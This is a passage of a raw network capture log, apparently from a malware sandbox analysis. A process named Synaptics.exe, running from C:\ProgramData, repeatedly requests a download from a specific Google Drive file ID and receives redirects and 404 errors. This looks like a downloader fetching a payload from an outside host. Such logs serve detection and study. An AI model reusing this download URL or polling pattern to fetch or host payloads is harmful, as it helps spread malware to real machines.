                                                                                                                    2024-12-30 10:25:50 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    79 | 192.168.2.9 | 49848 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:50 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GtsgUC6KtsASNkvgAQhIyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.9 | 49849 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:50 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JzfjBNuRZTVqKVy-H4TM4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.9 | 49850 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:51 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0r_imhGte1s0cmpIyNDYZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.9 | 49851 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:51 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:51 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4Pd2JZdLN5rxP2YRFlt1z5ZK45_21DhlLbN3VLWNBC2cOchmIhdJFXN24QPs4xBe4RYqqdU_c
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-oS-mmyYWXisnZt2GA575MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:51 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:51 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="IX9JZmexo9L524s2KftXTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:51 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.9 | 49852 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:51 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:51 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6gTZ1GLjWAi_LNWUp6_920NWYSkqnv_mj1ErfNpW1wyRK9rieehWMOFkUkWHN7aCGz
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-F9H49tN0mxGEXD8F9w8QrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:51 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:51 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="K8cYedfFoC6cq3yqLxBk9Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:51 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.9 | 49853 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:51 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:25:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-G3bK-ekiGWNzNqppFmlRPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    85 | 192.168.2.9 | 49856 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:52 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:52 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-6SanypZU6FBVAMLNUHUhPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    86 | 192.168.2.9 | 49857 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:52 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:52 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4JtAQ2gGlGyOhTHfM3BPddoL2OrRHWFt48QlE9Q8PnOWeo1omrR8MWOfJzGBPruBx_
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UyvE_SHWJefABK4uFAfPnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:52 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:52 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Oi4G1FQlsowV2AAhqTiwVw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:52 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    87 | 192.168.2.9 | 49859 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:52 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:52 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TRULE2gK2eM2k00hcGUOpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    88 | 192.168.2.9 | 49860 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:25:52 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:52 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC42zK-9Zkj0LXEoNdxqsVwikXZfQJHsfpVu7Mx-5vRWLKHsEhe8QqqcYmWZi-w73nkIZ6NgONA
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-31ZoMVaTgvf5rIikqJINOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:52 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
